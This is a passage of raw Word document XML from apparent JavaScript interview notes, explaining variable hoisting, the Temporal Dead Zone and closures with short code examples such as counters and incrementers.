    </w:p>
    <w:p w14:paraId="12D11635"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>const z = 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DB934" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, both y and z are hoisted, but they cannot be accessed before their initialization because they are in the TDZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C70AD0" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary of Hoisting Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6780B" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Function Declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Fully hoisted. You can call functions before they are declared in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22683DD3" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var Declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The declaration is hoisted, but the initialization is not. Accessing the variable before initialization returns undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14189D00" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>let and const Declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The declarations are hoisted, but accessing them before initialization causes a ReferenceError due to the Temporal Dead Zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BB835" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example for Clarification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22775E6D"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example() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E5044"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console.log(a); // undefined (due to var hoisting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0A2449"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console.log(b); // ReferenceError (due to TDZ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1EC75A"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 // ReferenceError (due to TDZ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2C8CD"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36E12C0"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var a = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D22505"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let b = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2FF6A"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c = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D741B"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D0BE72E"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CB0B278" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314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example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB6882" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why Understanding Hoisting Is Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4FE91" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Understanding hoisting helps you write more predictable and bug-free code. Knowing how and when variables and functions are hoisted can prevent unexpected behaviors, such as using a variable before it’s defined or encountering ReferenceError due to the TDZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E9109" w14:textId="77777777" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="005A3D24" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E24853" w14:textId="527FDDC4" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc178383252"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are closures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="09447093" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What Is a Closure in JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F6B8E" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>closure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a feature in JavaScript where an inner function has access to the outer (enclosing) function’s variables, even after the outer function has finished executing. Closures allow the inner function to remember the variables from its outer scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEDEA3E" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Interview Questions on Closures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71404D8C" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is a closure, and how does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEBEBF8" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22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A closure is created when a function is defined inside another function and the inner function retains access to the outer function’s variables, even after the outer function has returned. Closures are useful for creating private variables or maintaining state across function calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA13E8"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outerFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A741C"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let outerVariable = 'I am outside!';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F65454A"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B20101C"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function innerFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3816CF20"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console.log(outerVariable); // Accesses the outerVariable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E14C701"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E235D09"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DB4FCC9"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innerFunction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73526EAD"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C6CE3E0"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86EDA1F"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closure = outerFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2B79F"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closure(); // Logs: "I am outside!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B18DD" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can you give a practical example of how closures are used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37618C07" w14:textId="2F314292" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22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Closures are often used to create private variables. For example, a counter function can be implemented using closures to maintain the state of the counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445BEF0"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function createCounter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BAC138"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let count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01937EDA"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2762E44"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function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD99B9A"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count += 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6933516D"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count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7A919"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6AF1081"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518F868"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9FE9BED"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counter = createCounter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0AD8A"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console.log(counter()); // 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE43D2"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console.log(counter()); // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087CD471"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console.log(counter()); // 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE9DFC" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, the count variable is private to the createCounter function and is accessible only through the returned inner function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FA975" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are some common use cases for closures?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3784D056" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D393D1E" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Hiding variables and making them private.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAABDA" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Function factories</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Creating functions with preset configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF78BA" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event handlers and callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Preserving state in asynchronous code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525749B1" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Partial application and currying</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Creating more specific functions from generic ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2E822" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do closures relate to the concept of scope?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F806293" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22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Closures are closely related to lexical scope, which is the scope where a function was created. A closure gives an inner function access to variables in its lexical scope, even after the outer function has returned. This is because the function keeps a reference to its outer scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5295EA" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can you explain the potential memory issues with closures?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4E1D29" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22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Since closures keep references to their outer scope, they can lead to memory leaks if not handled properly. For example, if a closure maintains a reference to a large object, that object will not be garbage collected until the closure itself is collected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C157A0" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What happens if you change a variable inside a closure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B9C00" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="228"/>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If you modify a variable that is part of a closure, the change is preserved across all calls to the closure. This is because the closure has a reference to the variable, not a copy of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314A870"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createIncrementer(start) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EA3DC"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function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D30FA3A"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start += 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC4B9A"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start;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED2631"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3DEF812"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BDFB54F"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03B91AF"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increment = createIncrementer(5);</w:t>
      </w:r>
    </w:p>
